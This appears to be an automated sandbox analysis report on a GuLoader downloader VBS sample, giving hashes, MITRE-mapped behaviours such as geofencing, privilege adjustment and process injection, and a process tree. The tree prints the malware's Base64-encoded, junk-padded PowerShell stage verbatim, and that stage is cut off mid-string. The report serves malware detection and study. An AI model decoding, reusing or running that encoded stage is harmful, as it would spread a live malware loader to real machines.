guloader | 3fd4674bc6364b35a1e0e144a04f3cdf671c5097cc5a7ff8cf0a7fa742773024

General

Target

195727592-042128-sanlccjavap0004-4150.vbs
Size

158KB
MD5

07dafb8da97b43009011125fd489c82e
SHA1

b95ad8ea65e871bd266b36764ccd653862c34696
SHA256

3fd4674bc6364b35a1e0e144a04f3cdf671c5097cc5a7ff8cf0a7fa742773024
SHA512

cfb4d330bccea58faa568e41a9a1f739e3f35786219b28f10b4a05a6722230047887ab17dfa5b7e86522ea74cc4882ca0623aa42d3ebc2db7084bd48d25f5272
SSDEEP

3072:05klbn2QX0ylHN8MZNpTsFREkhbK2+JuNOZ8Gk:/j2u0xkMGklK2yuNv

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4968	powershell.exe
4968	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4968	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1964 wrote to memory of 4968	1964	WScript.exe	85
PID 1964 wrote to memory of 4968	1964	WScript.exe	85
PID 1964 wrote to memory of 4968	1964	WScript.exe	85
PID 4968 wrote to memory of 308	4968	powershell.exe	89
PID 4968 wrote to memory of 308	4968	powershell.exe	89
PID 4968 wrote to memory of 308	4968	powershell.exe	89
PID 308 wrote to memory of 3956	308	csc.exe	90
PID 308 wrote to memory of 3956	308	csc.exe	90
PID 308 wrote to memory of 3956	308	csc.exe	90

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\195727592-042128-sanlccjavap0004-4150.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1964
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "JABGAGkAcgBlAGYAaQAgAD0AIABAACcADQAKAEUAcgBsAGEAcwBBAEMAYQBzAHQAcgBkAFMAZQBuAHQAcgBkAFMAcABoAHkAZwAtAE8AdABlAHMAYwBUAE0AYQB0AHIAaQB5AFoAbwBhAGMAdQBwAEQAcgBpAGYAdABlAFMAZgBpAG4AawAgAG4AaQB0AHIAYQAtAEYAcgBlAG0AawBUAFMAZQBtAGkAcgB5AFcAYQBzAHAAaQBwAFMAagBsAGUAcwBlAHIAbgB0AGcAZQBEAE4AeQBzAHQAYQBlAEQAZQBsAGkAYwBmAEMAZQByAGUAbQBpAEMAbABpAHMAZQBuAEEAbQBiAG8AaABpAFAAcgBlAGMAbwB0AFMAawBqAGEAbABpAFMAbAB1AGsAawBvAEIAeQBnAGcAZQBuAEsAbwB1AHAAcgAgAEIAbwB4AGkAbgBAAEUAcwBwAGEAcgAiAAoATQBkAGUAYQBmAHUAUwB0AHUAZABzAHMAQwBhAHQAaABvAGkARwBlAG4AcgBlAG4AVQBuAG4AZQByAGcAUwBwAGEAdABpACAARgBvAHIAdgByAFMAUABsAGEAdABhAHkAQgBpAGEAdQByAHMAUwB2AGIAZQBzAHQAUwBjAHUAdAB0AGUATQBhAGEAZABlAG0AQQBuAG4AdQBsADsACgBGAHIAZQBjAGsAdQBKAG8AdQByAG4AcwBVAGQAZwBhAG4AaQBHAGEAYQBiAGUAbgBEAGUAbgB0AGEAZwBVAGQAdQBlAGwAIABCAGwAbwBtAHMAUwBFAHgAcwBjAGkAeQBzAHQAYQBsAGsAcwBSAGUAcABsAGkAdABOAGUAZABqAHUAZQBTAHUAbAB0AGEAbQBUAHUAYgB1AGwALgBnAGUAbgBlAHIAUgBTAHkAbgBzAGUAdQBNAGkAYQBvAHcAbgBUAGkAbABzAHQAdABJAG0AcAByAGkAaQBNAGEAcgB2AGUAbQBLAGwAYQBzAHMAZQBHAG8AbwBzAGUALgBVAG4AaQBtAGkASQBNAGkAYwBoAGkAbgBBAGwAYQByAG0AdABCAGEAZwBlAHIAZQBTAG8AbQBuAGkAcgBmAGEAcgB0AGoAbwBVAGQAbAB5AGQAcABDAGgAYQB0AHMAUwBTAHUAcABlAHIAZQBFAHQAaABlAHIAcgBTAGsAcgBhAGEAdgBMAGkAZABrAGIAaQBwAGUAbgBzAGwAYwBWAGEAcgBtAGUAZQBEAGkAYwBlAGwAcwBCAGwAcwBlAHIAOwAKAFUAZABmAHIAZABwAFcAaABpAHIAbAB1AFUAbgByAGUAYQBiAEYAYQByAHYAZQBsAFMAdQBwAGUAcgBpAFIAZQBtAGUAbgBjAEYAbwBsAGsAZQAgAEEAcwBjAGUAbgBzAEIAdwBhAG4AYQB0AFMAaABhAGgAegBhAE8AdgBlAHIAcAB0AFMAcAByAGcAZQBpAEoAdgBuAGUAZABjAEEAZABzAHQAcgAgAEYAbgBnAHMAbABjAEEAeABpAGwAbABsAEUAcABpAGsAZQBhAFMAdABvAHIAbQBzAHMAawBhAGEAbgBzAEYAdQBuAGsAdAAgAEEAZgBtAGEAZwBJAEkAbQBtAGUAZABuAEwAbwBrAG8AbQB0AEEAZwBnAHIAZQBlAEsAbABhAHYAZQByAEYAbwByAG0AYgBuAEwAaQBuAGEAaAAxAAoAVABvAGQAZAB5AHsAVAB1AHMAYwBoAFsAQgBhAHYAbgBlAEQATwBmAHIAZQByAGwAUgBlAGYAbABvAGwARABlAHAAaAB5AEkAUABzAGUAdQBkAG0AZwByAHUAbQBiAHAAQwBvAG4AZwBlAG8AQgBlAG4AZABpAHIAbABpAG4AaQBlAHQASQBuAGQAZQBrACgARABpAHMAcwBpACIAQQBuAHQAaQBjAHcAVABpAGwAcwB0AGkAWgBlAGMAYwBoAG4ATABpAG4AZABlAG0AQQBiAHMAbwByAG0ASwBpAG4AbwBvAC4AUwBvAGMAbwB0AGQASQBsAGwAdQBzAGwAZwBhAGwAbABzAGwASQBtAG0AZQB0ACIAVQBuAGcAZABvACkAUwBwAHIAZwBlAF0AYwBvAGIAbwBsAHAATwBpAGwAYgBpAHUAUwB0AHIAaQBnAGIAcwB3AGkAZgB0AGwAUgBhAGYAcgBhAGkAZgBvAHIAZQBiAGMAUwBhAGwAcwBpACAASABvAGwAbwBnAHMAVQBuAGkAZgBvAHQAQwBsAGUAYQByAGEARwBlAG4AbwBwAHQASQBuAHQAZQByAGkAUwBpAGwAaQBjAGMAUABvAG4AZABlACAARwBhAHIAZABlAGUAVQBkAGQAZQBsAHgAUwBtAG8AdgBzAHQATQBlAG0AYgByAGUAQQBuAGsAbABhAHIATABhAHMAawBlAG4AbABvAG0AbQBlACAAQwBhAHIAbgBpAGkARwBlAHIAbgBpAG4AVQBuAGQAZQByAHQARABvAHQAZQByACAATABuAGYAbwByAG0AUgBvAGUAawB1AGkAVwBvAG0AYQBuAHgAVgBlAGwAcwBpAGUAVgBpAGwAbABpAHIAVQBuAGkAbgBnAE0ARgBvAHIAYQByAGUAVQBuAHIAZQBhAHMAUwB1AGMAYwBlAHMAVQBuAGQAZQBmAGEATQBhAG4AdQBzAGcARgBvAHIAdAByAGUAUABzAGUAdQBkACgAaQBuAGQAZQBoAGkASQBuAHQAZQByAG4AVQBkAG0AYQBsAHQAUwB0AG4AawBwACAARABlAHAAZQB0AEYASwByAGkAZwBzAGEAcwBhAGcAcgBlAGcARgBhAGwAcwB0AHAAUABlAHIAYQBtAG8AUAByAGUAawBuAGwAQQBuAHQAcgBvACwATQBhAHMAcwBlAGkAQgBsAG8AbQBzAG4AQQBjAGMAdQBzAHQAUwBoAG8AdABtACAAcAByAGUAZgByAFUASwBhAG4AbwBuAGQAUwBwAGwAaQB0AHMAYQBhAGcAZQByAGsAaQBuAHQAZQByACwASABpAG4AawBlAGkAUwB1AG0AbQBhAG4ARwB1AGwAZABrAHQAVAByAGEAbgBxACAAQgBlAHIAYgBlAFMAUABpAG4AYQBnAGgAUABlAHIAZQBtAG8ASABpAGUAcgBvAHIAUABpAHEAdQBlAHQAdQBvAHAAcwBsAGUATQBpAHMAZgBvACwAQgBlAHQAbABlAGkARQBmAHQAZQByAG4AUwBoAGUAaQBrAHQARABlAHMAaQBuACAAUwBsAHUAdABuAE0ARwBsAG8AbQBlAGEAQQByAGIAZQBqAHMAVABoAGUAYQB0ADEAVgB1AGcAZwBlADUATgBhAHQAdABlADMARgBnAHMAaQB0ACkARgByAGUAbQBsADsACgBSAGUAbABlAGMAWwBPAG0AZABpAHMARABzAHQAdQBlAHAAbABPAHYAZQByAHMAbABNAGkAdAB0AGUASQBTAHQAZQBuAGcAbQBIAGEAbAB2AGYAcABIAHUAawBiAGEAbwBOAG8AbgBkAGUAcgBGAGwAYQBzAGsAdABLAG8AbgB0AHIAKABVAGcAZQBuAG4AIgBBAGYAbABiAHMAawByAGkAcwBpAGsAZQBBAHIAbQBiAHIAcgBTAHUAYgBzAHQAbgBPAHYAZQByAHAAZQBVAGEAdQB0AG8AbABNAGUAbABsAGUAMwBlAHgAcABpAGEAMgBEAG8AYgBiAGUAIgBvAHAAdABhAGcAKQBHAGEAcwB0AHIAXQB2AGkAbABsAG8AcABPAHUAdAB3AGUAdQBMAG4AZwBlAHIAYgBEAGEAZwB2AG8AbABDAGEAcgBiAG8AaQBQAHIAbwB0AG8AYwBGAG8AcgBlAHMAIABBAGMAaAB5AGQAcwBFAGsAcwBwAG8AdABNAGEAbABlAHIAYQBLAG0AcABlAHIAdABDAG8AdQBuAHQAaQBCAGUAdgBnAGUAYwBPAHUAdAByAGkAIABzAGEAbABnAHMAZQBPAG0AZwBuAGcAeABNAG8AbgBlAHQAdABSAGUAcQB1AG8AZQBBAGQAcgBlAHMAcgBTAGgAaQBuAGIAbgBTAGUAbAB2AGIAIABBAG4AcwB2AGEAaQBFAHMAdABpAHYAbgBBAHIAYwBoAHAAdABBAGIAYQBuAGQAIABSAGEAYwBlAGgAVgBCAGUAYwByAHkAaQBCAGkAdAB0AGUAcgBCAGEAYwB0AGUAdABBAGYAZgBpAG4AdQBQAGEAbgBlAGwAYQBIAGoAZQBzAHQAbABUAGkAbABzAGsAQQBIAGEAZgBuAGkAbABTAHUAYgBnAG8AbABVAGQAYgB1AGwAbwBOAGUAZwByAGkAYwBCAGUAcwBwAGUAKABlAHMAdABpAG0AaQBCAGUAcgB5AGwAbgBBAGMAdABpAG4AdABOAG8AdABpAGMAIABHAGUAbwBmAGEAdgBCAGEAZABlAHYAMQBIAGEAcgBkAGQALABXAGEAcwBoAGEAaQBBAGcAYQBjAGUAbgBCAGoAcgBuAGUAdABDAHkAYwBsAG8AIABTAGsAdQBsAHAAdgBVAHMAbABpAG4AMgBQAHUAbgBjAGgALABFAHAAaQB0AG8AaQBDAGgAbwBrAG8AbgBSAGUAZwBpAHMAdABFAG4AZQByAGcAIABHAHIAdQBuAGQAdgBMAGQAcwB0AGUAMwBJAG4AZABzAGsALABOAHMAdABiAGUAaQBTAHQAYQBuAGcAbgBLAGkAYgBiAHUAdABHAGUAbgBwAGEAIABBAHIAaQB0AGgAdgBHAG8AdAB0AGgANABPAHYAZQByAHMAKQBUAG8AcABrAG8AOwAKAE0AdQBsAHQAaQBbAE0AZQBkAGIAeQBEAFQAbwB1AHIAbgBsAHYAYQByAGkAZQBsAEIAbwBhAHMAdABJAEgAaQBnAGgAdABtAEwAYQBuAGkAZQBwAFQAaQBsAGwAYQBvAEkAbgBkAGkAZgByAFQAZQBkAGEAYgB0AFMAZQBtAGkAcgAoAEkAZABpAG8AbQAiAEMAbwBvAGwAZQBnAEgAZQBuAG4AYQBkAEEAZQBzAHQAaABpAFMAaQBsAGQAZQAzAEEAbABpAG0AZQAyAFAAZQByAGkAbAAiAFMAdAByAGEAdAApAEMAbwB1AG4AdABdAGkAbgB0AG8AeABwAEkAbgB0AGUAcgB1AEUAbQBiAGwAYQBiAHAAcgBvAGwAZQBsAEQAZQBjAHIAZQBpAEQAZQBuAGkAZQBjAFMAbAB1AHMAZQAgAEYAYQBjAGUAdABzAEMAaABhAHIAYQB0AGkAbgBnAGUAbgBhAEcAbABhAHQAcgB0AEQAaQBzAGkAbABpAFIAZQBiAHIAbwBjAEYAbwByAHMAbAAgAFMAdAByAHUAZQBlAFYAZwBnAGUAbgB4AEsAbwBtAHAAbwB0AEUAZgB0AGUAcgBlAEIAbABhAG4AawByAFIAZQBrAHUAcgBuAE0AbwBuAG8AZgAgAEEAdABoAGUAbgBpAEIAbwByAGQAcwBuAFUAbgBzAGEAdgB0AFUAbgBpAHYAZQAgAGEAbQBiAGEAcwBTAFMAaQBnAGkAbAB0AFMAdABpAGwAYgByAFMAaQBjAGsAbABlAEQAbwBsAG0AZQB0AEMAaABlAG0AbwBjAFcAaQBzAHQAZgBoAFMAbwBsAGkAcwBEAFAAZQBuAGcAZQBJAFQAdQBuAG4AZQBCAEEAYgByAGEAegBpAEcAZQBtAHkAdAB0AEgAdQBkAGYAbABzAFAAcgBvAGsAbAAoAGEAcgBnAGkAbABpAFIAaABhAGIAZABuAGIAYQBjAGsAZgB0AFMAaQBmAGYAbAAgAEQAYQBnAHMAcgBNAFMAYwB1AGwAcABpAFMAaABpAGUAbABuAFQAbwBsAGsAZQAsAEgAeQBwAG8AYwBpAEgAbwB2AGUAZABuAE4AeQBuAGEAegB0AFYAaQB2AGkAZgAgAFAAZQBqAGwAZQBIAEQAbwBtAHMAYQBhAHMAbwB1AHMAYQBhAE0AYQBzAGsAYQBuAFMAbABiAGEAcgBkAEcAcgBlAGwAbwBrAEMAaABhAGYAZgAsAFUAZAByAGEAYQBpAEwAYQBiAGkAbABuAFUAbgBiAGUAdwB0AFIAaABiAHAAaAAgAEEAbgB0AGkAcwBIAEIAaQBsAGwAZQB1AHAAbAB1AHIAaQBzAFMAbwB0AGUAcgBnAFIAdQBzAHMAZQBlAFMAZQBuAG4AZQByAFMAbwB1AHIAYwAsAEUAeABwAGUAZABpAFQAaQBsAHMAdABuAFUAbgBkAGUAcgB0AFUAbgBnAGsAYQAgAFUAbgBzAGgAaQBEAGEAZABlAG4AeQBlAEIAYQB0AGMAaABhAEwAbwBjAGsAbwBkAEoAZQBuAHMAawAsAHMAYQBuAHQAYQBpAEwAZQB0AHQAZQBuAHAAbwBsAGkAdAB0AEgAdgBpAHMAcAAgAE0AZQBhAG4AZABIAE8AdgBlAHIAaQBvAFUAbgBzAHUAYgBjAFUAbgBuAGUAZwBrAFMAZQBtAGkAbgBzAFQAdgBhAG4AZwBoAFMAcAByAGkAdAAsAEwAaQBtAGIAbwBpAFYAZQBnAGkAZQBuAFMAawBhAG0AcwB0AEgAbwBnAGUAbgAgAEcAbwByAHMAZQBFAFIAZQB0AHQAZQBrAFAAcgBlAGkAbgBzAEcAdQByAGsAbABwAEgAZQBtAGUAaQBvAEkAbgB0AGUAcgAsAEwAYQBkAHkAZQBpAFMAdABhAHIAdABuAEkAbgBiAG8AYQB0AEMAaABhAHIAdAAgAHMAdAByAGEAYQBNAEYAcgBlAG0AcwBhAFQAcgBhAG4AcwB0AE0AZQBwAG0AaQByAFQAYQBpAGEAcwBvAEYAYQBiAGwAZQAsAFAAdQBzAHMAaQBpAFUAYgBsAGEAbgBuAG4AZQBkAHQAcgB0AEQAeQByAGUAdAAgAE8AcABzAHQAdgBMAEkAbgBkAGwAYgBuAEEAbgB0AGkAcABlAFAAcgBhAGsAawBzAEYAcgBlAGUAdwAsAEcAeQB0AHQAYQBpAFMAcgBnAGUAZgBuAFYAZQBkAGUAcgB0AFQAYQByAG4AaQAgAEgAcgByAGUAbgBCAEYAbwByAHMAdABhAFIAZQBvAHIAZwBhAFQAcwB3AGEAbgBrAEEAbgBhAHQAaABlAEYAbwBrAGsAZQAsAFkAcABwAGkAZwBpAFcAYQB4AHcAaQBuAGYAbAB5AGcAdAB0AEYAbwByAHMAdAAgAE4AbwBuAGYAYQBQAFMAdABpAG4AdQBhAE8AbgB5AGMAaABkAEwAaQBuAGkAZQBkAE0AYQBsAGwAZQB5AEEAcABvAHAAaAAsAFUAbgBwAHUAbgBpAEgAZQBpAGQAZQBuAEUAagBlAHIAdAB0AEgAbwB2AGUAZAAgAEwAYQBtAG0AZQBQAEEAZwBsAG8AYgBhAFMAaQBrAGsAZQByAFYAZQBrAHMAZQB0AFoAZQB1AGcAbQAsAEMAYQBsAGEAbgBpAFYAaQBjAGUAZABuAEwAZQBkAGUAbAB0AEwAcwBlAGIAbwAgAFAAaABpAGwAbwBXAEMAbwBpAG4AcwBoAFYAYQBlAHIAawBpAEwAZQBtAHAAZQB6AFYAaQB2AGkAZgBiAEYAcgBvAG4AdABhAFMAawBpAG4AaAAsAEsAbwBuAHQAbwBpAGQAZQBsAHMAdABuAEMAdQBzAGgAaQB0AFMAawBvAGwAYQAgAEgAYQBpAHIAYgBBAEIAagBlAHIAZwBzAEkAcwBiAHIAeQB0AFQAYQBtAGkAbABvAEEAdQB0AG8AdAApAFUAbgBsAG8AYwA7AAoAQwBpAHYAaQBsAFsAQwByAGUAdgBhAEQARQB4AGMAZQByAGwASABlAGoAcwBlAGwAUwBrAGkAZABlAEkAUAByAG8AZAB1AG0ATgBvAG4AcgBlAHAASwBvAG0AbQB1AG8AUgBhAGQAaQBrAHIARwBhAHIAbgBpAHQATwBwAHQAagBlACgAVQBuAG0AdQBsACIAVQBkAHMAbwBuAGcAYQBkAGoAdQBkAGQAQgB5AGcAZwBlAGkASABvAG0AZQBvADMAUwBlAG0AaQBwADIAVQB0AGkAbABzACIAVQBuAGUAeABwACkARgBlAGoAZABlAF0AQQBmAHQAZQBuAHAAQwBoAGkAZwBuAHUAQQB4AGkAbwBtAGIAVQByAHQAaQBkAGwATwB4AGEAbgBpAGkAUABzAHkAYwBoAGMATAB1AG0AaQBuACAARABlAGEAdABoAHMARQBuAGcAZQBsAHQAQQBuAGEAcgBrAGEAQQBzAGsAaQBsAHQAQQBzAHMAZQBuAGkAVQBsAHQAcgBvAGMAVQBkAG0AYQBnACAATABvAGEAZABpAGUAQgBhAGMAYwBhAHgAQwB1AG4AagBlAHQATQBvAGQAZQBzAGUAUABsAHUAawBuAHIAUwB0AGUAbQBtAG4AVABhAGwAdQBjACAATwBuAGQAZQB0AGkASwBsAGUAYgBpAG4ARQBhAHIAdABoAHQAUwBlAHIAdgBpACAAQQBwAGkAbABpAEUAYQBhAGIAbgBlAHgARABpAGQAZABhAHQASwBuAHMAZABpAFMAZgBvAHIAZgBhAGUAUwBoAGEAawBlAGwATwB6AG8AZQBuAGUAQgBpAGgAdQBsAGMATQBlAHQAZQBvAHQASQBkAGUAbgB0AEMAUwBjAHIAdQBtAGwATQBpAG4AaQBhAGkAVAB1AGIAYQBpAHAARgByAHMAdABlAFIAVQBuAHIAZQBsAGcAVABhAHIAcABpAG4ARgBhAGMAdABvACgATwBtAHIAZQBkAGkAUwBrAHIAaQBnAG4ARABhAGwAcABhAHQAQwBvAHMAbQBvACAAVQBuAGQAZQByAFIATQBpAGMAcgBvAGUAUAB1AG0AYQBlAHYAUAByAG8AZwBuACwARABpAGEAYwBvAGkARABlAHMAdABhAG4ARgBhAGkAbgBzAHQASgB1AHAAYQB0ACAATQBlAHMAbwByAFMAQwBhAG4AbgBhAHQARgByAHUAbQBwAHIASgBhAHoAegBlAGkASgBlAG4AZwBlAHAAQgBhAG4AdABhACwARwByAGwAaQBnAGkAVAB5AHAAaQBmAG4AUABoAGwAZQBnAHQAbABpAGEAbgBlACAASwBhAGYAdABlAFMARgBhAHIAaQBzAGMAVABhAHgAYQBlAHUATgBhAHYAaQBnAGQAUwBwAGEAZwBlACkAUwBhAGwAdAB2ADsACgBIAGEAcgBwAG8AWwBUAGgAZQByAGUARABBAGYAbAB1AHMAbABUAGUAbABvAGwAbABDAGEAcwB1AGEASQBSAGUAdABvAHIAbQBOAGkAZAB2AGkAcABIAGEAZQBtAG8AbwBTAHAAawBuAGkAcgBQAHIAbwBjAGwAdABTAGsAaQBuAG4AKABUAGkAbABoAHUAIgBWAG8AcgBuAGUAdwBOAGkAZwBoAHQAaQBSAGUAbgB1AG0AbgBBAGYAdgBhAHIAcwBVAGcAZQBzAGsAcABEAGEAZABlAGwAbwBQAGEAbgBnAHUAbwBTAHAAeQB0AG4AbABPAHAAYQBsAG8ALgBXAGkAbgBkAHMAZABQAHIAbwBjAGEAcgBLAGwAYQBzAHMAdgBkAGUAdgBpAG8AIgBNAGIAZQBsAHQAKQBNAGUAbABsAGUAXQBDAHkAdABvAGQAcABCAGUAcwB0AGkAdQBVAG4AZQBxAHUAYgBBAGYAcwB0AG4AbAByAGkAcABlAHMAaQBCAGUAZwBpAHIAYwBIAGUAZABuAGkAIABNAGEAcwBzAGUAcwBEAGUAZgBlAGMAdABUAG8AdQBjAGgAYQBCAGUAagBkAHMAdABQAHMAeQBjAGgAaQBIAHkAZAByAG8AYwBhAHMAcwBvAGMAIABGAGwAYQBnAGUAZQBMAGEAbgBnAGYAeABGAGkAZwB1AHIAdABTAHAAaQByAHIAZQBvAHAAZQByAGEAcgBWAHIAcwB0AGUAbgBVAG4AZgBlAGUAIABGAGEAeABmAHIAaQBNAGkAcwBpAG4AbgBEAHUAYwBhAHQAdABOAG8AbgBmAGEAIABWAGsAcwB0AHIAQQBNAGEAdABpAG4AZABGAG8AcgBrAGwAZABCAHUAcwBzAHkAUABPAHYAZQByAGwAbwBGAHkAcgByAGUAcgBVAG4AZABpAHMAdABDAG8AbgBmAHUAKABMAGUAdgBlAHIAaQBkAGUAbgBpAGMAbgBJAG0AbQBlAG4AdABwAGEAYQBrAHIAIABJAG4AZABiAHIARQBkAGEAcgBuAGUAcwBTAHQAagBlAHIAawBPAHYAZQByAGEAYQBBAGcAYQBzAHQAZABQAGEAbgB0AG8AcgBQAHIAZQBiAGwALABOAG8AbgBjAG8AaQBTAGEAbABnAHMAbgBBAGsAawBsAGEAdABTAHUAbABwAGgAIABEAG8AbQBtAGUASwBTAGwAYQBnAHAAbwBQAHIAaQBtAHUAbgBTAG0AaQBkAGcAdABFAG4AdAB5AGQAcgBIAHkAcwB0AGUAbwBVAG4AcgBlAHMALABMAG8AbQBtAGUAaQBTAHkAbQBwAHQAbgBTAG0AYQBhAHQAdABFAHgAaQBsAGEAIABCAHUAdABlAGIAQwBzAGsAaQBuAGsAaQBMAHMAawB1AHIAcgBQAGEAcwB0AHIAawBLAGEAcwBpAG4AKQBKAGkAYgBiAHkAOwAKAEYAaQByAHMAdABbAFQAbwB0AGEAbABEAFUAcgBlAGQAZQBsAE4AaQB0AHIAbwBsAEgAbwB2AGUAZABJAFAAaQBlAHQAaQBtAE8AcAByAGkAbgBwAHQAYQBuAGEAZwBvAEEAbgBhAGMAYQByAFYAaQBzAG4AZQB0AGQAdQBwAGwAaQAoAFQAYQBsAGUAZAAiAHIAbwBrAGsAZQBrAE8AcABsAG8AZABlAFYAYQBsAGcAYwByAEEAcgBlAGEAbABuAGgAeQBwAGUAcgBlAFMAbQBnAGUAbgBsAEYAdQBsAGQAcwAzAEEAbgB0AGkAcAAyAEEAZwBlAGwAYQAiAFMAdgByAGQAcwApAFQAcgBhAGQAcwBdAEYAbwBhAG0AZgBwAFMAdQBsAHAAaAB1AEYAcgBlAG0AbQBiAFIAdQB0AHMAYwBsAEEAbgBrAGwAYQBpAEMAbwBnAGwAbwBjAEEAbgBhAGwAZQAgAEMAdQBwAHIAbwBzAFMAdABhAGwAZAB0AFIAaQBnAHMAZgBhAGUAbABpAGcAZQB0AEcAcgBvAGUAbgBpAFMAZQBjAHUAcgBjAEIAbABvAGsAbwAgAFQAcgBhAGYAaQBlAEYAcgB1AHQAaQB4AFMAbQB1AGcAZwB0AFMAdABvAGMAYwBlAFUAbgBuAHUAcgByAEsAbwBrAGsAZQBuAEYAbABhAHQAdAAgAEIAdQBzAGcAYQBpAFQAZQBnAG4AZQBuAFIAbwBtAGEAbgB0AEIAYQBjAGsAcwAgAFUAbQBiAHIAYQBJAEIAZQBsAGkAbgBzAG4AbwBuAHAAaQBWAEgAbwBtAG8AegBhAFUAbgBtAGEAbABsAEgAagBnAGEAYQBpAFQAcgBhAG4AcwBkAFAAcgBlAGQAZQBMAEcAcgBhAGYAaQBvAFQAcgBpAHYAaQBjAEsAbwBuAGQAZQBhAEYAZQBlAGwAeQBsAEIAZQBzAGwAdQBlAEIAYQBzAHQAaAAoAFAAYQBsAG0AZQBpAGMAYQByAG4AYQBuAEgAagBlAG0AbAB0AEkAbgBkAHUAcwAgAEMAZQByAHQAaQBSAE0AbABrAGUAdgBlAFIAZQBzAHQAcgB2AE0AaQBjAHIAbwBpAFAAbgBlAHUAbQBiAEEAbgB0AGkAcwAsAEQAZQBrAG8AbABpAGQAeQBrAHMAdgBuAEkAbgB2AGkAdAB0AE0AdgByAGUAawAgAEIAZQBiAHIAZQBTAEIAaQBzAHQAdABlAFQAcgBvAG0AbQB0AFMAaQBuAGQAZQBwAEYAcgBlAG0AbQBmAEYAeQBzAGkAbwAxAEEAbgBsAG8AZwAxAE0AZQB0AGUAcgA5AFUAbABvAGIAbwApAGYAcgB5AHMAZQA7AAoAUgB1AG4AZABlAFsAUABhAHIAdABpAEQAUwBrAGkAbgBuAGwARQBsAGYAZQBuAGwARQByAGgAdgBlAEkAQQBmAHQAZQByAG0AQQBkAHYAbwBrAHAAUwBqAGkAcABuAG8ARgBhAGIAdQBsAHIAVQBwAGEAYQBhAHQARABpAHMAcABlACgAUwBwAGwAaQB0ACIATQB5AGUAbABpAEEAQgBsAGkAbgBrAEQAVABvAG0AYgBvAFYAQwBhAHMAZQBtAEEAUwBrAGkAbgBkAFAAQgByAGEAZAB5AEkAQQB1AHQAbwBhADMAawBvAG4AZgBpADIAQQB1AHQAbwBtAC4ATABpAGIAZQByAEQAUAByAG8AZgBlAEwAVQBuAHMAdABhAEwAUgB1AHMAawBpACIAUABhAGEAdABlACkAQwBhAG4AbgBvAF0AUwB0AGkAcABlAHAAVQBuAGQAZQByAHUARgBvAHIAZAByAGIAVAByAGkAbABsAGwASABhAGkAcgBzAGkAQgBlAHMAawBmAGMATABpAGcAZwBlACAAUgBpAG0AYQB0AHMASABhAG4AcwBpAHQASABhAHUAdABlAGEAeQBlAG4AaQBzAHQAUgBlAHQAcgBvAGkAQwBsAGEAcgBlAGMAWQBuAGQAZQByACAAVwByAGkAcwB0AGUATwB0AG8AbQB1AHgARABvAHIAeQBlAHQAYwBvAHUAbgB0AGUAQgByAG8AbgBjAHIAUgBlAHYAaQBzAG4ARgBvAG4AZABzACAARABhAG0AcABpAHYAQwByAHkAcAB0AG8ASwBsAGEAZABkAGkAUgB1AHMAdABpAGQAUwBtAGQAZQBzACAARwBpAG4AYQBzAEYAQQBmAGgAYQBuAHIAdQBwAGwAbwBhAGUAUABsAGEAaQBuAGUAdABlAG4AcwBpAFMAQwBpAHIAYwB1AGkAUABhAHIAYQBuAGQAYgBhAG4AawBiACgAYgByAGEAbgBkAGkATQBvAG4AYQBjAG4AUwB0AGEAYQBsAHQASwBhAHIAdABvACAAQQBwAHAAYQBsAFgARwBsAG8AbQBlAGUATgB5AGwAbwBuAHIAUgBlAHYAZQByAG8AUAByAGkAbgB0AG4AVgBvAGcAbgBsAGkAZgBuAHQAdQBiACkAVABlAG0AZQByADsACgBJAG0AcABhAHIAWwBGAHIAZQB1AGQARABWAGkAcgBpAGwAbABuAG8AbgBvAHIAbABXAHIAaQBjAGsASQBCAGkAdAB0AGUAbQBIAGEAZgB0AGEAcABKAGUAcABwAGUAbwBJAGQAeQBsAGwAcgBCAHUAbgBjAGgAdABFAHIAaQBnAGkAKABTAGsAaQBiAHMAIgBHAGwAYQByAGUAawBTAHQAYQB1AG0AZQBFAHgAdQBkAGEAcgBiAGwAdQBiAGIAbgBDAG8AaQBuAGQAZQBIAG8AbwBrAG0AbABBAG4AaABlAG0AMwBKAGUAawBhAHQAMgBJAG4AdABlAHIAIgBBAG4AZwByAGUAKQBCAGUAZwB5AG4AXQBqAG8AaQBuAGUAcABLAGUAbgB0AGYAdQBHAGUAbwBmAHkAYgBQAGgAbwB0AG8AbABQAG8AbAB5AHAAaQBNAGEAcgBrAGgAYwBUAHIAbwBnAGwAIABOAG8AbgBlAHAAcwBUAGUAaQBuAG8AdABVAG4AZgBhAHQAYQBLAG8AbQBtAGEAdABaAGkAYgBlAHQAaQBGAHIAYQBnAG0AYwBUAGEAbABlAG0AIABzAGwAdgByAHYAZQBUAGUAawBuAG8AeABTAG4AZQBkAHIAdABQAGgAYQBuAHQAZQBQAG8AbABhAHIAcgBEAGoAaQBiAG8AbgBCAGwAdQBzAGgAIABEAGUAZAB1AGMASQBLAGUAbABzAGUAbgBFAG0AbwB0AGkAdABBAHQAdABlAHMAUABCAGoAZQByAGcAdABCAGwAaQBuAGQAcgBDAGgAZQBtAGkAIABTAGUAZQBpAG4ARQBLAHYAYQBuAHQAbgBGAG8AcgBmAHIAdQBvAG4AZAB1AGwAbQBVAHYAdQByAGQAUwBNAGEAbgBnAGUAeQBOAG8AbgB5AGwAcwBHAHIAZQBjAGkAdABLAGwAbwBhAGsAZQBGAG8AcgBtAGEAbQBTAGsAYQB0AHQATABJAG4AZABpAGMAbwBNAGEAawBhAGIAYwBTAHQAdQBlAG8AYQBTAHAAZQBjAGkAbABTAHYAcgB0AGUAZQBUAHIAbABhAGcAcwBGAHIAYQB0AGEAQQBTAGsAbwBoAG8AKA